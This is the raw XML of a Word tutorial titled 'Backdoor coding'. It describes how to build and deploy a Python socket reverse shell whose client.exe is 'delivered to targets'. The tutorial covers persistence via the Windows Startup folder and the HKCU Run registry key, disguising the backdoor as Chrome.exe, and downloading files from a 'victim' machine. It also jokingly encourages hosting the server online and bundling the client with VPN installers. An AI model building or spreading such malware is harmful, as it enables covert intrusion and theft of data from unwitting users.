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B4E30" w14:textId="7A7EE90F" w:rsidR="00E931F1" w:rsidRPr="006D2D76" w:rsidRDefault="006D2D76" w:rsidP="006D2D76">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D2D76">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Backdoor coding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7438FBC1" w14:textId="58C8D948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 never suggest anyone hosting the Backdoor server on the Internet</w:t>
      </w:r>
      <w:r w:rsidR="00B92E1E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and sending their victims’ bundled VPN &amp; this backdoor </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B92E1E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>client.exe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B92E1E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491EFFD1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Yet, you may do whatever you want to host the Backdoor server on the Internet :D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4548DF19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DEE09E0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1. Server listening for connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFDCEB5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2. Payload/reverse shell delivered to targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EFEB2B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D1D9C4C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Using socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5401FAFB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TCP/IP handshake connection for the backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2669123B" w14:textId="4D959CD3" w:rsidR="00896962" w:rsidRDefault="006D2D76" w:rsidP="00896962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90C9198" w14:textId="77777777" w:rsidR="00C74A9E" w:rsidRDefault="00C74A9E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3C9A2FE6" w14:textId="63C684A1" w:rsidR="00896962" w:rsidRPr="00896962" w:rsidRDefault="00896962" w:rsidP="00896962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896962">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F13D9CA" w14:textId="4023DA92" w:rsidR="00896962" w:rsidRP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896962">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Server folder structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199CD89C" w14:textId="65ED4544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We’ve got:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105D2573" w14:textId="147C0AFA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dist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E58E584" w14:textId="7925C383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client.py</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4994808F" w14:textId="703E408E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server.py</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="63BC1CF4" w14:textId="5289BF1D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compile.sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="02C48973" w14:textId="0C071525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89696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06C2DEF2" wp14:editId="7CEFADB9">
            <wp:extent cx="3810532" cy="2924583"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="75331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1917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208E" w14:textId="77777777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573C21A0" w14:textId="77777777" w:rsidR="00896962" w:rsidRDefault="00896962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53BA48AF" w14:textId="7FAE27DC" w:rsidR="00896962" w:rsidRDefault="00C74A9E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On your Server =&gt; run</w:t>
      </w:r>
      <w:r w:rsidR="00896962">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4068D03E" w14:textId="1D0BA2B5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chmod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777 ./*.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120AC14C" w14:textId="2C8333D9" w:rsidR="00C74A9E" w:rsidRDefault="00C74A9E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python3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./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server.py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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286FB602" w14:textId="316F9797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89696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2117509A" wp14:editId="167BE822">
            <wp:extent cx="5210902" cy="685896"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="181378255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82552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42F2" w14:textId="77777777" w:rsidR="00C74A9E" w:rsidRDefault="00C74A9E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44456FB7" w14:textId="77777777" w:rsidR="00896962" w:rsidRPr="00896962" w:rsidRDefault="00896962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896962">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Victims’ client folder structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD6DE05" w14:textId="77777777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client.exe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7E53C53C" w14:textId="7680059F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 w:rsidRPr="0089696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2864AACF" wp14:editId="38F99F64">
            <wp:extent cx="3943900" cy="1733792"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1012026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65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D35D" w14:textId="77777777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</w:p>
    <w:p w14:paraId="21C000C8" w14:textId="5E668571" w:rsidR="00C74A9E" w:rsidRDefault="0089696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If you’re re-engineering this Backdoor to add more functions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CBF272" w14:textId="1258E1CA" w:rsidR="00896962" w:rsidRPr="00896962" w:rsidRDefault="00896962">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0089696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76DAC85D" wp14:editId="42458AA7">
            <wp:extent cx="3953427" cy="3467584"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="154993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384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606F" w14:textId="77777777" w:rsidR="00896962" w:rsidRDefault="00896962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A5051F1" w14:textId="5A36A8E6" w:rsidR="006D2D76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Victims =&gt; python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client.py</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0909F4A6" w14:textId="3B77B740" w:rsidR="00896962" w:rsidRDefault="0089696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89696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7ABDE62B" wp14:editId="6233EA3E">
            <wp:extent cx="4401164" cy="790685"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="666026818" name="Picture 1" descr="A computer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26818" name="Picture 1" descr="A computer screen with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E5A1" w14:textId="77777777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This backdoor now resides into victims’ machine </w:t>
      </w:r>
      <w:r w:rsidRPr="00896962">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\Users\IGS\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00896962">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AppData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00896962">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\Roaming\Microsoft\Windows\Start Menu\Programs\Startup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BE3DBA" w14:textId="170A52C1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 w:rsidRPr="0089696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0215829F" wp14:editId="0E40AC56">
            <wp:extent cx="4363059" cy="2514951"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1464081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8194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1349" w14:textId="77777777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Thus, this Backdoor will start automatically as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Chrome.exe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everytime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the victim starts his/her machine :D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5491F465" w14:textId="77777777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</w:p>
    <w:p w14:paraId="70EAB953" w14:textId="77777777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2A0D3028" w14:textId="7883BCB1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Testing download function:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3273F5D8" w14:textId="4CC0BBB3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We have an image file ‘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witch.jpg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’ on victim’s machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2A85D2" w14:textId="3231A6EF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 w:rsidRPr="0089696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35DDE7CE" wp14:editId="1D12A088">
            <wp:extent cx="3953427" cy="3467584"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1376369635" name="Picture 13763696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384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EAD9" w14:textId="505F9B54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We only have these files on our Backdoor Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2303245A" w14:textId="46D08FA0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 w:rsidRPr="0089696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4A22D4C0" wp14:editId="3548AB9B">
            <wp:extent cx="3877216" cy="2333951"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="671264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648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42C9" w14:textId="77777777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30F8B9FD" w14:textId="77777777" w:rsidR="00896962" w:rsidRDefault="0089696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Once our victim is connected to our Backdoor Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D8C195" w14:textId="3479EA20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 w:rsidRPr="0089696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4417A118" wp14:editId="598BFCE5">
            <wp:extent cx="5287113" cy="847843"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="6311080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0805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11F5" w14:textId="77777777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type ‘hostname’ &amp; ‘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whoami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’ to confirm victim’s machine identify:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1BFA5C" w14:textId="20619CD1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 w:rsidRPr="0066775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5BC9CAE0" wp14:editId="6778E21E">
            <wp:extent cx="3934374" cy="895475"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1575279343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9343" name="Picture 1" descr="A black background with white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AF8E" w14:textId="74655F68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‘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dir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’ or ‘ls -la’ to view present working directory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A319E20" w14:textId="7BBEA9EF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 w:rsidRPr="0066775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5C8A3B7F" wp14:editId="1924A56D">
            <wp:extent cx="5731510" cy="2389505"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="17765814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8147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7176" w14:textId="6FCF062E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Download ‘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witch.jpg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’ from victim’s machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1C202C" w14:textId="44688AE7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 w:rsidRPr="0066775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79A585F9" wp14:editId="5E119B4A">
            <wp:extent cx="5496692" cy="1324160"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="18939246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2464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69B" w14:textId="225AC9AA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 w:rsidRPr="0066775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0FF74BDD" wp14:editId="1D260D3E">
            <wp:extent cx="5391902" cy="971686"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="92754713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7130" name="Picture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2DE0" w14:textId="77777777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771494BB" w14:textId="77777777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‘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dir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’ or ‘ls -la’ again to confirm successful download from your victims:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2113EAC2" w14:textId="764E7814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 w:rsidRPr="0066775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3B618449" wp14:editId="2C673168">
            <wp:extent cx="5731510" cy="2621280"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="172546505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65058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78D" w14:textId="56BFE61C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Also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checkout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your Server folder:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B57F892" w14:textId="0BF6217D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 w:rsidRPr="00667752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7C6F70FA" wp14:editId="5A4E2C57">
            <wp:extent cx="3781953" cy="2819794"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1425507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076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B601" w14:textId="17E473F5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 w:rsidRPr="00667752">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="324146AF" wp14:editId="2B24468B">
            <wp:extent cx="5731510" cy="6816725"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="20413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50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F7FF" w14:textId="20388693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Congrats :D You’ve have successfully downloaded a .jpg file from your victim :D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64079FF2" w14:textId="77777777" w:rsidR="003C0CEE" w:rsidRDefault="003C0CEE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6057117D" w14:textId="77777777" w:rsidR="003C0CEE" w:rsidRDefault="003C0CEE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603CFD42" w14:textId="65EA15E6" w:rsidR="003C0CEE" w:rsidRDefault="003C0CEE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To exit Reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4B21DF" w14:textId="77777777" w:rsidR="003C0CEE" w:rsidRDefault="003C0CEE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q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B3F849" w14:textId="77777777" w:rsidR="003C0CEE" w:rsidRDefault="003C0CEE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C0CEE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56C44518" wp14:editId="429B9684">
            <wp:extent cx="5172797" cy="847843"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="77729339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93399" name="Picture 1" descr="A close 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D4E2" w14:textId="0333E3BA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You may try downloading files with other extensions e.g. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A2DB4C" w14:textId="30C283DF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7z</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3A087D54" w14:textId="21FA5CF0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rar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5FF5423E" w14:textId="0A927216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tar.gz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="46924D6D" w14:textId="7E89D366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.tiff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31085084" w14:textId="7F827AED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py</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="24BD71C7" w14:textId="68F7210F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.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEEA12E" w14:textId="09F3D2A5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.md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35903867" w14:textId="273F2DD9" w:rsidR="00667752" w:rsidRDefault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Any file extensions .* just work fine :D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A71119" w14:textId="77777777" w:rsidR="00667752" w:rsidRDefault="00667752" w:rsidP="00667752">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="214EADEF" w14:textId="77777777" w:rsidR="00667752" w:rsidRDefault="00667752" w:rsidP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You may also try out ‘upload’ function of this backdoor, by putting some files to Server folder on your Backdoor Server :D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAF5A8E" w14:textId="77777777" w:rsidR="00667752" w:rsidRDefault="00667752" w:rsidP="00667752">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="325DC803" w14:textId="72CCC2C5" w:rsidR="00766331" w:rsidRDefault="00667752" w:rsidP="00667752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You may add more custom functions to this Backdoor :D</w:t>
      </w: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39B8E6E0" w14:textId="0F9B9477" w:rsidR="006D2D76" w:rsidRPr="00896962" w:rsidRDefault="006D2D76" w:rsidP="00896962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896962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Theory for references</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057DFA58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IP Fragmentation illustration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF9A2B6" w14:textId="77777777" w:rsidR="006D2D76" w:rsidRDefault="00000000" w:rsidP="006D2D76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hyperlink r:id="rId20" w:anchor=":~:text=1.,on%20a%208%20byte%20boundary" w:history="1">
        <w:r w:rsidR="006D2D76">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>https://users.cs.fiu.edu/~esj/cgs4285/class11.html#:~:text=1.,on%20a%208%20byte%20boundary</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="006D2D76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE4086B" w14:textId="596C4B0F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E8439C8" wp14:editId="77141B68">
            <wp:extent cx="4362450" cy="2895600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2049857097" name="Picture 1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7097" name="Picture 16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C4B8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93E8423" w14:textId="50FEBC0B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1A9713F" wp14:editId="0A35E77F">
            <wp:extent cx="4314825" cy="2486025"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="987297825" name="Picture 15" descr="A computer cod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97825" name="Picture 15" descr="A computer code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FC86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36750F0" w14:textId="5B56070B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C6A2B38" wp14:editId="4E16CA27">
            <wp:extent cx="4600575" cy="2181225"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="27600401" name="Picture 14" descr="A computer cod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0401" name="Picture 14" descr="A computer code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B9C3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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671B5EFB" w14:textId="49BD4838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008D90F" wp14:editId="6CF9E46E">
            <wp:extent cx="4591050" cy="2152650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1041166836" name="Picture 13" descr="A computer cod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66836" name="Picture 13" descr="A computer code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A7D1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68DAE3B" w14:textId="08EE2804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E7C1853" wp14:editId="63DBF90C">
            <wp:extent cx="5731510" cy="2095500"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="975770845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70845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D4D7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82F19EA" w14:textId="7596DFC8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9BDF601" wp14:editId="7454D5B1">
            <wp:extent cx="4171950" cy="2257425"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1682776209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76209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0FBB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4225E29" w14:textId="13F70DD0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79353A4" wp14:editId="1913497D">
            <wp:extent cx="4314825" cy="4219575"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="72672296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2296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33F2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56C97B7" w14:textId="73181AD8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9FC74CC" wp14:editId="0D222CAA">
            <wp:extent cx="4257675" cy="7972425"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="11487222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2225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284A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D57B26E" w14:textId="77777777" w:rsidR="00F05A21" w:rsidRDefault="00F05A21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3BF18585" w14:textId="77777777" w:rsidR="00F05A21" w:rsidRDefault="00F05A21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6CF416EB" w14:textId="77777777" w:rsidR="00F05A21" w:rsidRDefault="00F05A21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4C020D9A" w14:textId="77A2D6A9" w:rsidR="00F05A21" w:rsidRDefault="00F05A21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# Socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE76C6E" w14:textId="6B202A42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Why IP Fragmentation HEADER must be 8 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B37B817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while the 2nd portion of it need NOT be 8 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339E1536" w14:textId="77777777" w:rsidR="006D2D76" w:rsidRDefault="00000000" w:rsidP="006D2D76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hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidR="006D2D76">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>https://stackoverflow.com/questions/7846442/why-the-ip-fragments-must-be-in-multiples-of-8-bytes</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="52A07DB3" w14:textId="7F5653E1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519951E" wp14:editId="3BCE95D1">
            <wp:extent cx="5731510" cy="3216275"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="15769461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4610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27FF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4597339" w14:textId="77777777" w:rsidR="0073097D" w:rsidRDefault="0073097D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7E225805" w14:textId="2657E0D8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====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Gaining persistency using Registry on Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0697B7B9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Theory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056FEA16" w14:textId="73C9B870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17A8608" wp14:editId="48BF73C9">
            <wp:extent cx="1866900" cy="1828800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12707898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8981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F21C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1BE4C7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ctrl + r =&gt; regedit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71248081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We'll be focusing on </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2062C961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HKEY_CURRENT_USER</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="08D4531A" w14:textId="43E0F414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If we use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HKEY_CURRENT_USER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, the reverse shell will only focus on the logon user and monitor specific users</w:t>
      </w:r>
      <w:r w:rsidR="00B844D2">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> login movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5484BD26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We'll focus on this exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A5FBD4" w14:textId="77777777" w:rsidR="00B844D2" w:rsidRDefault="00B844D2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03593732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We target startup program settings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10A72B38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Computer/HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7831C3B4" w14:textId="1BAB9DDA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474841F" wp14:editId="483E5E11">
            <wp:extent cx="5731510" cy="1733550"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="83088837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8372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D1B8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67AAFF3" w14:textId="77777777" w:rsidR="0020171E" w:rsidRDefault="0020171E">
      <w:pPr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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D3471B" w14:textId="0C3E8B82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Persistance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is gained:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445B8052" w14:textId="0719EC93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4FD8157" wp14:editId="0C8FE391">
            <wp:extent cx="5731510" cy="5325745"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="8562604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6048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9566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7713CDD" w14:textId="77777777" w:rsidR="00B844D2" w:rsidRDefault="00B844D2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AE0D32" w14:textId="65E2C375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lastRenderedPageBreak/>
        <w:t># We'd like to manipulate the Registry keys first</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613D1845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# C:\Users\USER\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AppData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>\Roaming is hidden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD8F87D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# We'll target this directory for our Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C1C30E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# This will point to whoever user's /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AppData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4164BC70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72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>location</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="47B7A0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>environ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>appdata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
